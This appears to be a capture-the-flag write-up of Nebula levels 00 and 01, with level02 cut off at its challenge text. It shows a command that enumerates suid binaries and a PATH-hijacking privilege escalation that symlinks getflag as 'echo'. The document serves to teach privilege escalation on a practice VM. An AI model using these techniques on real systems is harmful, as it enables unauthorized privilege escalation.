Nebula Exploit Exercises

Level00

Nebula level00.

SSH to the server, and login as 'level00' with the password 'level00' as instructed.

The challenge is to find a program with the suid-bit set, which means that it will execute as the owner of the program, not the user who runs it. In order to do this, I ran:

find / -perm -u=s -type f 2>/dev/null

Which returned a couple of normal files, but also this one:

/bin/.../flag00

I ran /bin/.../flag00, followed by getflag, and the challenge was done.

[email protected]:~$ /bin/.../flag00
Congrats, now run getflag to get your flag!
[email protected]:~$ getflag
You have successfully executed getflag on a target account
[email protected]:~$ 

Level01

Nebula level01.

SSH to the server, and login as 'level01' with the password 'level01' as instructed.

The challenge is:
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?

The flaw is that its using the users environment / $PATH to search for the 'echo' program. This can easily be manipulated by changing the PATH, then creating a symbolic link to the 'getflag' and finally running the flag01 program in /home/flag01/flag01

export PATH=/home/level01/:$PATH
ln -s /bin/getflag echo
/home/flag01/flag01
You have successfully executed getflag on a target account

Level02

Nebula level02.

SSH to the server, and login as 'level02' with the password 'level02' as instructed.

The challenge is:
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?